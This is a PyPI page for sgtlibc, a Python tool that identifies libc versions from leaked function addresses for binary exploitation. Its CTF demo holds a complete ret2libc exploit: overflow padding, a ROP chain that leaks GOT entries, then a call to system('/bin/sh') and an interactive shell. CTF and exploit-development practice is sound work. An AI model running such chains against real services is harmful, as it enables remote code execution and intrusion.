a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`
Project description
What?
sgtlibc is a a offline python-lib for search libc function.
Install
pip install sgtlibc
Usage
usage: main.py [-h] [-d [DUMP ...]] [-i [INDEX]] [-u [UPDATE]] [funcs_with_addresses]
for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`
positional arguments:
funcs_with_addresses specify `func-name` and `func address` , split by `|`,eg: puts:aa0+read:140 , its means func-put's address = 0xaa0;func-read addr = 0x140 (default: None).
options:
-h, --help show this help message and exit
-d [DUMP ...], --dump [DUMP ...]
select funcs to dump its info (default: ['__libc_start_main_ret', 'system', 'dup2', 'read', 'write', 'str_bin_sh']).
-i [INDEX], --index [INDEX]
db index on multi-database found occation (default: 0).
-u [UPDATE], --update [UPDATE]
update current libc database from internet , need non-microsoft-windows environment (default: False).
Quick Start
- in cmd.exe
or
/bin/sh`
sgtlibc puts:aa0
sgtlibc puts:aa0+read:140
sgtlibc puts:aa0+read:140 --dump system binsh
- in
python3
import sgtlibc
s = sgtlibc.Searcher()
s.add_condition('puts', 0xaa0)
s.add_condition('read',0x140)
print(s.dump())
print(s.dump(['system','str_bin_sh']))
Example
-
main args
specifyfunc-name
andfunc address
,**SHOULD split by|
**eg:
puts:aa0+read:140
which means:- func-
puts
address =0xaa0
- func-
read
address =0x140
- func-
-
--update
is for update libc database from internet base onlibc-database
, require non-microsoft-window system -
run [python code above](/#/Quick Start) , you'll get output-result like following shows:
-
run command in terminal , you'll get output-result like following shows:
-
use in
pwntools
from pwn import * # should run pip install pwntools before
import sgtlibc
s = libc.Searcher()
puts_addr = 0xff1234567aa0 # from leak data
s.add_condition('puts',puts_addr)
libc = s.dump() # search libc , if returns multi-result ,default use index-0's result
offset = puts_addr - libc[sgtlibc.s_puts] # puts_write
system_addr = p64(libc[sgtlibc.s_system] + offset)
binsh_addr = p64(libc[sgtlibc.s_binsh] + offset)
CTF Problem Solve DEMO
- use exploit code
import sgtlibc
from sgtlibc.gamebox import *
set_config(GameBoxConfig(
is_local=True, file='./babyrop2', remote='192.168.0.1:25462',
auto_load=True,
auto_show_rop=True,
auto_show_summary=True,
auto_start_game=True,
auto_load_shell_str=True,
auto_show_symbols=True
))
s = sgtlibc.Searcher()
elf = client.elf
payload_exp = b'a' * (28 + 4) + p00(0xdeadbeef) # overflow position
def leak(func: str):
payload = payload_exp + p00(elf.rop['rdi']) + p00(elf.got[func]) + \
p00(elf.plt['printf']) + p00(elf.symbols['main'])
sl(payload)
rl()
data = rc(6).ljust(8, b'\0')
data = uc(data)
s.add_condition(func, data)
return data
leak('printf')
leak('read')
data = s.dump(db_index=2) # choose your system index
system_addr = s.get_address(sgtlibc.s_system)
binsh_addr = s.get_address(sgtlibc.s_binsh)
log.info(f'system_addr:{hex(system_addr)}')
log.info(f'binsh_addr:{hex(binsh_addr)}')
payload = payload_exp + p00(elf.rop['rdi']) + p00(binsh_addr) + \
p00(system_addr) + p00(0xdeadbeef)
sl(payload)
interactive()
- result
Notice
default libc database is update long-time ago , we fully recommanded to update it by run
sgtlibc --update
Status
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Hashes for sgtlibc-1.10.165-py3-none-any.whl
Algorithm | Hash digest | |
---|---|---|
SHA256 | 667f748266fa3a382170c942947d5725bf54445c903684ba7681593f89530316 |
|
MD5 | d4fe3abc9d8b9ed6889326aceddee39b |
|
BLAKE2b-256 | fd5bd0e34bd351459872e40b256e40c3aa2dae547b2f31846e014657a6022bcd |